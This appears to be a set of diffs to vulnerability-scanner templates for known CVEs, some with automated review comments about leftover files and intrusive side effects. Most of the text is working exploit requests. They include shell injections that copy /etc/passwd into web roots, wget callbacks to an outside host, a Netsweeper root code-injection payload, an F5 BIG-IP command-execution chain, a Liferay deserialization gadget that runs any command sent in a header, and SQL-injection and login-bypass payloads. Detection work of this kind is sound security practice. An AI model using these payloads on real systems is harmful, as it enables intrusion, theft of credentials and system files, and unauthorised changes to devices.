Referer: {{Hostname}}
Content-Length: 168
Connection: close
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
@ -26,6 +21,7 @@ requests:
- type: status
status:
- 200
- type: word
words:
- "<param-name>contextConfigLocation</param-name>"


@ -12,11 +12,7 @@ requests:
- |
PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Connection: close
{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}
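Review bot: `SubscribeURL` points at `https://rfi.nessus.org/rfi.txt`, so every scan makes the target fetch a resource from an unrelated third-party host and the template has no way to observe that request. Use `http://{{interactsh-url}}` with an interactsh matcher, as other templates in this commit do; that gives an actual proof and keeps scan traffic off someone else's server. If detection instead relies on the response body echoing the fetched file, say so in a comment. The matchers are outside the hunk.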


@ -11,31 +11,21 @@ info:
tags: cve,cve2019,emerge,rce
requests:
- raw: # Default Port
- raw:
- |
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
- |
GET /nuclei.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
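Review bot: The first request writes the contents of `/etc/passwd` into `nuclei.txt` under the web root (the backtick-wrapped `cat /etc/passwd > nuclei.txt`) and the second reads it back, leaving a world-readable copy of the password file on the target after the scan. Either append a request that removes it through the same `ReaderNo` injection (`rm nuclei.txt`) or document the artifact with `# Leaves nuclei.txt containing /etc/passwd in the web root; clean up after confirming`. Both requests run unauthenticated, so anyone who can reach the host can read the leftover file.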


@ -10,31 +10,27 @@ info:
- https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077
tags: cve,cve2019,kibana,rce
# Kibana versions before 5.6.15 and 6.6.1
# contain an arbitrary code execution flaw in the Timelion visualizer.
# An attacker with access to the Timelion application could send a request
# that will attempt to execute javascript code.
# This could possibly lead to an attacker executing arbitrary commands
# with permissions of the Kibana process on the host system.
requests:
- method: POST
path:
- "{{BaseURL}}/api/timelion/run"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
Content-Type: "application/json; charset=utf-8"
body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}"
body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}'
matchers-condition: and
matchers:
- type: word
words:
- "seriesList"
part: body
- type: word
words:
- "Content-Type: application/json"
- "application/json"
part: header
- type: status
status:
- 200
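Review bot: The header matcher now only requires `application/json` somewhere in the response headers and the body matcher only `seriesList`, which any working Timelion endpoint returns for `.es(*)` — so the template flags every reachable Kibana Timelion, not the versions (before 5.6.15 and 6.6.1) that the removed comment identified as vulnerable. Either add a check against the reported Kibana version or restore the caveat as `# Detects Timelion exposure only; Kibana before 5.6.15 / 6.6.1 is the vulnerable range` so a match is not read as a confirmed RCE. The `.es(*)` body itself is benign and executes nothing on the target.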


@ -12,7 +12,6 @@ requests:
- |
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/xml
<!DOCTYPE xxe [


@ -1,4 +1,5 @@
id: CVE-2019-9733
info:
name: Artifactory Access-Admin Login Bypass
author: akshansh
@ -15,18 +16,13 @@ requests:
- |
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
Host: {{Hostname}}
Content-Length: 60
Accept: application/json, text/plain, */*
X-Requested-With: artUI
serial: 58
X-Forwarded-For: 127.0.0.1
Request-Agent: artifactoryUI
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Content-Type: application/json
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/artifactory/webapp/
Accept-Language: en-US,en;q=0.9
Connection: close
Origin: {{BaseURL}}
Referer: {{BaseURL}}/artifactory/webapp/
{"user":"access-admin","password":"password","type":"login"}
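Review bot: `X-Forwarded-For: 127.0.0.1` is presumably the substance of this bypass — the template name says the access-admin login is being bypassed and the header spoofs a loopback origin — yet it sits among cosmetic headers with nothing marking it as load-bearing. Add `# X-Forwarded-For: 127.0.0.1 is required; the access-admin login is only honored for local clients` so a future cleanup does not strip it. `Content-Length: 60` matches the 60-byte JSON body exactly, so that header is safe as written.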


@ -15,24 +15,17 @@ requests:
- |
GET /api/experimental/test HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
- |
GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
- |
POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
Content-Length: 85
Content-Type: application/json
{"conf": {"message": "\"; touch test #"}}
@ -40,8 +33,6 @@ requests:
- |
GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
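Review bot: The sequence unpauses `example_trigger_target_dag` and triggers a real run whose `conf.message` is `"; touch test #`, so a successful probe executes a shell command on the worker, leaves a `test` file behind, and the DAG stays unpaused afterwards. The template should say so — `# Intrusive: unpauses and runs example_trigger_target_dag; executes 'touch test' on the worker` — and, if the experimental API allows it, re-pause the DAG in a final request. `Content-Length: 85` also does not match the 41-byte JSON body shown; if it survives the cleanup it should go. The `{{exec_date}}` extractor that feeds the last request is outside the hunk.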


@ -13,10 +13,8 @@ requests:
- |
POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Content-Length: 218
Accept: */*
Content-Type: application/x-www-form-urlencoded
nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-


@ -10,33 +10,22 @@ info:
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
# This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
# prior, to execute code as the root user.
# Authentication is bypassed by sending a random whitelisted Referer
# header in each request.
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
# been confirmed exploitable.
requests:
- method: GET
path:
# Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
# Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/out"
headers:
Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php"
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
Connection: "close"
Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"
matchers-condition: and
matchers:
- type: word
words:
- "nonexistent"
part: body
- type: status
status:
- 200
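Review bot: The `Referer` header is the authentication bypass for `unixlogin.php` — the removed comment said the script accepts any whitelisted Referer — and the cleanup has made it look like an ordinary browser header. Keep it with `# Referer must be a whitelisted webadmin path; this is the auth bypass, not a cosmetic header`. The injected Python also writes `/usr/local/netsweeper/webadmin/out` on the target (as root, per the removed description) and the second path reads it back, so that artifact deserves a note too.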


@ -13,13 +13,11 @@ requests:
- |
GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
- |
GET /include/nuclei.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
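Review bot: The first request writes `/etc/passwd` into `/include/nuclei.txt` on the target and the second fetches it, leaving a world-readable copy of the password file on the server after the scan. Add a comment above the requests, e.g. `# Leaves include/nuclei.txt with /etc/passwd contents on the target; remove after confirmation`, or append a cleanup request through the same `_exec` primitive. `Content-Type: application/x-www-form-urlencoded` on these body-less GETs does nothing and can go with the other headers.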


@ -14,7 +14,6 @@ requests:
- |
POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
matchers-condition: and
matchers:


@ -13,16 +13,12 @@ requests:
- |
GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
- |
GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
cookie-reuse: true
matchers-condition: and
@ -33,6 +29,7 @@ requests:
- "Position: ||whoami||"
- "root"
condition: and
part: body
- type: status
status:


@ -16,9 +16,7 @@ requests:
POST /jars/upload HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"


@ -14,25 +14,14 @@ requests:
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: close
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 745
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin: {{BaseURL}}
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="action"


@ -13,34 +13,21 @@ requests:
- | # Response:Location: /page/login/login_fail.html
POST / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
DNT: 1
Connection: close
Cookie: uid=6gPjT2ipmNz
Upgrade-Insecure-Requests: 1
Content-Length: 0
username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
- | # Get /etc/passwd
GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
DNT: 1
Connection: close
Cookie: uid=6gPjT2ipmNz
Upgrade-Insecure-Requests: 1
Content-Length: 0
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "nobody:[x*]:65534:65534"


@ -19,9 +19,7 @@ requests:
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Length: 608
Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48
Connection: close
--------------------------ca81ac1fececda48
Content-Disposition: form-data; name="reqid"


@ -15,18 +15,14 @@ requests:
- |
POST /cgi-bin/system_mgr.cgi? HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}`
- |
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
matchers:
- type: word


@ -15,9 +15,7 @@ requests:
- |
POST /login.htm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=


@ -16,17 +16,10 @@ requests:
- |
GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
- |
GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
matchers:
- type: word


@ -14,10 +14,7 @@ requests:
POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
X-Requested-With: XMLHttpRequest
Content-Type: application/json
User-Agent: Ophion SecurityGroup
Accept-Language: en-US,en;q=0.9
{"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"}


@ -13,12 +13,9 @@ requests:
- |
POST /goform/setSysAdm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/login.shtml
Origin: {{BaseURL}}
Referer: {{BaseURL}}/login.shtml
admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
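Review bot: The body posted to `/goform/setSysAdm` sends `admuser=admin&admpass=;wget http://{{interactsh-url}};`, so on an affected device the scan would presumably replace the administrator password with the injected string rather than only trigger the callback. The template's info block is outside this hunk, but it should state that the check changes device state (and carry the repository's tag for intrusive checks, if one is in use). A comment on the raw block such as `- | # NOTE: rewrites the admin credentials on affected firmware` would make that visible in the file itself. The switch of `Origin`/`Referer` to `{{BaseURL}}` is fine and keeps the scheme consistent with the target.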


@ -17,7 +17,6 @@ requests:
POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E


@ -14,30 +14,16 @@ requests:
- |
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
- |
GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 269
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryBJ17hSJBjuGrnW92
Content-Disposition: form-data; name="action"
@ -52,11 +38,6 @@ requests:
- |
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
extractors:
- type: regex


@ -15,14 +15,6 @@ requests:
- |
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1
matchers:
- type: word


@ -15,8 +15,6 @@ requests:
POST /dfsms/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 66
username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=


@ -26,11 +26,13 @@ requests:
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
- "{{BaseURL}}/hsqldb%0a"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
@ -38,41 +40,35 @@ requests:
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
- "HSQL Database Engine Servlet"
condition: or
part: body
- raw:
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=create%20cli%20alias%20private%20list%20command%20bash
- |
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=list%20%2Ftmp%2Fnonexistent
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=delete%20cli%20alias%20private%20list
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "h3ll0_w0Rld"


@ -14,9 +14,6 @@ requests:
- |
GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
matchers:
- type: word


@ -7,6 +7,7 @@ info:
tags: cve,cve2020,rce,liferay
description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
reference:
- https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html
- https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
- https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
@ -15,14 +16,8 @@ requests:
- |
POST /api/jsonws/invoke HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
Content-Length: 4938
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
X-Requested-With: XMLHttpRequest
cmd2: §command§
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A617
6612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A7661722
06275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D
@ -39,8 +34,7 @@ requests:
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"
condition: or
part: body
- type: status
status:
- 200
@ -50,4 +44,4 @@ requests:
part: body
regex:
- "Microsoft Windows (.*)"
- "Distributor ID: (.*)"
- "Distributor ID: (.*)"


@ -14,23 +14,18 @@ requests:
- |
POST /menu/stapp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
X-NITRO-USER: xpyZxwy6
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
matchers-condition: and
matchers:
- type: word
words:
- "</title><script>alert(31337)</script>"
part: body
- type: status
status:
- 200


@ -15,7 +15,6 @@ requests:
- |
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/xml
X-NITRO-USER: xpyZxwy6
X-NITRO-PASS: xWXHUJ56
@ -25,30 +24,18 @@ requests:
- |
